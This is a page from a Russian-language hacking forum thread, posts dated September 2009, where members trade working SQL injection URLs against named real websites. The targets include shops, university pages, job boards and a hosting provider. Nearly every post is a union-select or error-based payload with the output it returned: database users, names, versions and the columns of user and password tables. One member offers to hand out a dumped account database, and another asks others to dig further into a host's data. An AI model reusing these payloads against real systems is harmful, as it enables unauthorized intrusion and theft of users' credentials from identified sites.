ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10771  
Старый 23.09.2009, 09:26
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.butilka.ru/catalog_wine.html?group=_absent&id=-11)+unIon+sElecT+1,concat_ws(0x3a,%20user(),databa se(),version()),3,4,5,6,7,8,9,10,11,12,13+--+
User: visitor@localhost
Database: butilka
Version: 5.0.70-log
 
Ответить с цитированием

  #10772  
Старый 23.09.2009, 20:28
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

Код:
http://www.asp.wroc.pl/wyswietl_konkurs.php?id=-202+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2,3,4,5,6--
asp@localhost : asp_site : 4.1.22-log
Код:
http://www.usbe.umu.se/news/news_eng.php?ID=-00000001644+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3--
usbe_webb@localhost : USBE_news : 5.0.54-log

Последний раз редактировалось Shadrin; 23.09.2009 в 21:37..
 
Ответить с цитированием

  #10773  
Старый 24.09.2009, 12:42
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Код:
http://slovco.ru/sovremslov/yu/podrobno.php?id=-536+union+select+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5--
root@localhost:slovco:5.0.60-log
 
Ответить с цитированием

  #10774  
Старый 24.09.2009, 13:28
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию

Код HTML:
http://www.altaservisnsk.ru/index.php?id=-6+union+select+1,concat_ws(0x3a,version(),database(),user())--
5.0.81-community:ipdenis_altaservis:ipdenis_admin@localho st

Код HTML:
http://www.deti.spb.ru/writers_rus/?a_id=-121+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
5.0.33:deti_test:deti@localhost

Код HTML:
http://shoprusbook.ru/ulist.php?g=-109597+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--
5.0.67
 
Ответить с цитированием

  #10775  
Старый 24.09.2009, 17:09
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

Apache/2.2.8 (Fedora)
PHP/5.2.6
Код:
http://spartak.tambovsport.ru/champ/online.php?id=63'
Код:
http://spartak.tambovsport.ru/champ/online.php?id=63+and+1=0+ Union Select   UNHEX(HEX([visible]))  ,2,3,4,5,6
6 columns
user
Код HTML:
tambovsport@localhost
Database
Код HTML:
tambovsport
 
Ответить с цитированием

  #10776  
Старый 24.09.2009, 17:24
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://wordtrans.org/engine/index.php?action=docs&name=-clients'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26+--+

http://www.nwinnovation.com/showjob.php?id=2493+union+select+1,2,3,4,5,group_c oncat(table_name),7,8,9,10,11,12,13+from+informati on_schema.tables+group+by+table_schema+/*+


http://www.gamachejobs.com/showjob.php?jobid=-135+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12,13,14,15,16,17,18,19+from+information_schema.ta bles+--+


http://www.51hengtianran.com/en/showjob.php?id=89&idd=-6+union+select+1,2,3,4,5,6,7,8+from+admin+/*+

http://hrjobs.com/showjob.php?id=-1+union+select+1,2,concat_Ws(0x3a3a,id,passwd,LEVE L,lastseen),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21+from+users+--+
 
Ответить с цитированием

  #10777  
Старый 24.09.2009, 17:27
Gray_Wolf
Постоянный
Регистрация: 07.03.2009
Сообщений: 357
Провел на форуме:
1284900

Репутация: 399
По умолчанию

Server:
Код:
http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)--
Цитата:
PostgreSQL 8.2.9 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14):kiev.attrade:kiev.attrade
TABLES:
Код:
http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT TABLE_NAME from INFORMATION_SCHEMA.TABLES LIMIT 1 OFFSET 193)+as+int)--
Цитата:
useraccounts
COLUMNS:
Код:
http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=chr(117) || chr(115) || chr(101) || chr(114) || chr(97) || chr(99) || chr(99) || chr(111) || chr(117) || chr(110) || chr(116) || chr(115) LIMIT 1 OFFSET 1)+as+int)--
Цитата:
gusrid
usrnam1
usrnam2
usremail
usrlogin_sm
usrpwd_sm
usrlogin
usrpwd
P.S.: tnx Ins3t за помощь с Psql
 
Ответить с цитированием

  #10778  
Старый 24.09.2009, 17:58
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

PHP код:
5.0.45-log 
PHP код:
PHP/5.2.0-8+etch15 
User
PHP код:
fifakulte@localhost 
Database
PHP код:
fifakultecom1 
PHP код:
Columns 12 
Код:
http://www.fifakulte.com/online.php?id=896+and+1=0+ Union Select  1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11,12

P.S Кому нужно могу базу акков скинуть оттуда. Но врятли кому надо)
 
Ответить с цитированием

  #10779  
Старый 24.09.2009, 18:29
djmeir13
Новичок
Регистрация: 11.09.2009
Сообщений: 7
Провел на форуме:
71553

Репутация: 7
По умолчанию

Код:
http://www.sugar-free-games.com/showgame.php?game=-1145+union+select+1,group_concat(table_name,0x3c62723e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema=database()
 
Ответить с цитированием

  #10780  
Старый 24.09.2009, 18:55
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

Скулка на хостинге. Если чего наковыряете напишите мне в лс.
Код:
PHP/5.2.0-8+etch15
User
Код:
hostacci_client@localhost
Database
Код:
hostacci_client
Columns
Код:
5
Код:
http://www.hostaccion.com/?p=contrato-online.php&id=13+and+1=0+ Union Select   UNHEX(HEX([visible]))  ,2,3,4,5
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT.XYZ